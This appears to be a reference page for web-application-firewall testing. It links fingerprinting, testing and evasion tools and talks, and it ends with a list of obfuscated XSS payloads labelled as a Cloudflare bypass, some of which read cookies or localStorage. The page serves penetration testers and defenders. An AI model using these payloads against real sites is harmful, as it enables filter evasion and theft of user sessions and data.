Web Application Firewall
WAF Testing Resources
Awesome-WAF - The Definitive Guide.
Detection and Fingerprinting Tools
WhatWaf - Detect and bypass web application firewalls and protection systems
WAFW00F - The ultimate WAF fingerprinting tool with the largest fingerprint database from @EnableSecurity.
WAF Testing Guides and Tools
XSS-Rat's WAF Checklist - Everything you need to do to bypass a Web Application Firewall.
Lightbulb Framework - A WAF testing suite written in Python.
WAF Testing Framework - A WAF testing tool by Imperva.
Framework for Testing WAFs (FTW) - A framework by the OWASP CRS team that helps to provide rigorous tests for WAF rules by using the OWASP Core Ruleset V3 as a baseline.
abuse-ssl-bypass-waf - Bypassing WAF by abusing SSL/TLS Ciphers
WAF Evasion and Bypass Tools
WAFNinja - A smart tool which fuzzes and can suggest bypasses for a given WAF by @khalilbijjou.
libinjection-fuzzer - A fuzzer intended for finding
libinjectionbypasses but can be probably used universally.bypass-firewalls-by-DNS-history - Firewall bypass script based on DNS history records. This script will search for DNS A history records and check if the server replies for that domain. Handy for bugbounty hunters.
abuse-ssl-bypass-waf - A tool which finds out supported SSL/TLS ciphers and helps in evading WAFs.
SQLMap Tamper Scripts - Tamper scripts in SQLMap obfuscate payloads which might evade some WAFs.
Bypass WAF BurpSuite Plugin - A plugin for Burp Suite which adds some request headers so that the requests seem from the internal network
Training and Research
Many of the content mentioned above have been taken from some of the following excellent writeup
Methods to Bypass a Web Application Firewall - A presentation from PT Security about bypassing WAF filters and evasion.
Web Application Firewall Bypassing (How to Defeat the Blue Team) - A presentation about bypassing WAF filtering and ruleset fuzzing for evasion by @OWASP.
WAF Profiling & Evasion Techniques - A WAF testing and evasion guide from OWASP.
Protocol Level WAF Evasion Techniques - A presentation at about efficiently evading WAFs at protocol level from BlackHat US 12.
Analysing Attacking Detection Logic Mechanisms - A presentation about WAF logic applied to detecting attacks from BlackHat US 16.
WAF Bypasses and PHP Exploits - A presentation about evading WAFs and developing related PHP exploits.
Side Channel Attacks for Fingerprinting WAF Filter Rules - A presentation about how side channel attacks can be utilised to fingerprint firewall filter rules from UseNix Woot'12.
Our Favorite XSS Filters/IDS and how to Attack Them - A presentation about how to evade XSS filters set by WAF rules from BlackHat USA 09.
Playing Around with WAFs - A small presentation about WAF profiling and playing around with them from Defcon 16.
A Forgotten HTTP Invisibility Cloak - A presentation about techniques that can be used to bypass common WAFs from BSides Manchester.
Building Your Own WAF as a Service and Forgetting about False Positives - A presentation about how to build a hybrid mode waf that can work both in an out-of-band manner as well as inline to reduce false positives and latency Auscert2019.
Research Papers:
Protocol Level WAF Evasion - A protocol level WAF evasion techniques and analysis by Qualys.
Neural Network based WAF for SQLi - A paper about building a neural network based WAF for detecting SQLi attacks.
Bypassing Web Application Firewalls with HTTP Parameter Pollution - A research paper from Exploit DB about effectively bypassing WAFs via HTTP Parameter Pollution.
Poking A Hole in the Firewall - A paper by Rafay Baloch about modern firewall analysis.
Modern WAF Fingerprinting and XSS Filter Bypass - A paper by Rafay Baloch about WAF fingerprinting and bypassing XSS filters.
WAF Evasion Testing - A WAF evasion testing guide from SANS.
Side Channel Attacks for Fingerprinting WAF Filter Rules - A paper about how side channel attacks can be utilised to fingerprint firewall filter rules from UseNix Woot'12.
WASC WAF Evaluation Criteria - A guide for WAF Evaluation from Web Application Security Consortium.
WAF Evaluation and Analysis - A paper about WAF evaluation and analysis of 2 most used WAFs (ModSecurity & WebKnight) from University of Amsterdam.
Bypassing all WAF XSS Filters - A paper about bypassing all XSS filter rules and evading WAFs for XSS.
Beyond SQLi - Obfuscate and Bypass WAFs - A research paper from Exploit Database about obfuscating SQL injection queries to effectively bypass WAFs.
Bypassing WAF XSS Detection Mechanisms - A research paper about bypassing XSS detection mechanisms in WAFs.
Cloudflare Bypass
Cloudflare Bypass
<svg%0Aonauxclick=0;[1].some(confirm)//
<svg onload=alert%26%230000000040"")>
<a/href=j	a	v	asc
ri	pt:(a	l	e	r	t	(1))>
<svg onx=() onload=(confirm)(1)>
<svg onx=() onload=(confirm)(document.cookie)>
<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
"><onx=[] onmouseover=prompt(1)>
%2sscript%2ualert()%2s/script%2u -xss popup
<svg onload=alert%26%230000000040"1")>
"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm))
[1].map(confirm)'ale'+'rt'()a	l	e	r	t(1)prompt(1)prompt(1)prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``)
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
<svg/onrandom=random onload=confirm(1)>
<video onnull=null onmouseover=confirm(1)>
<a id=x tabindex=1 onbeforedeactivate=print(`XSS`)></a><input autofocus>
:javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
<img ignored=() src=x onerror=prompt(1)>Last updated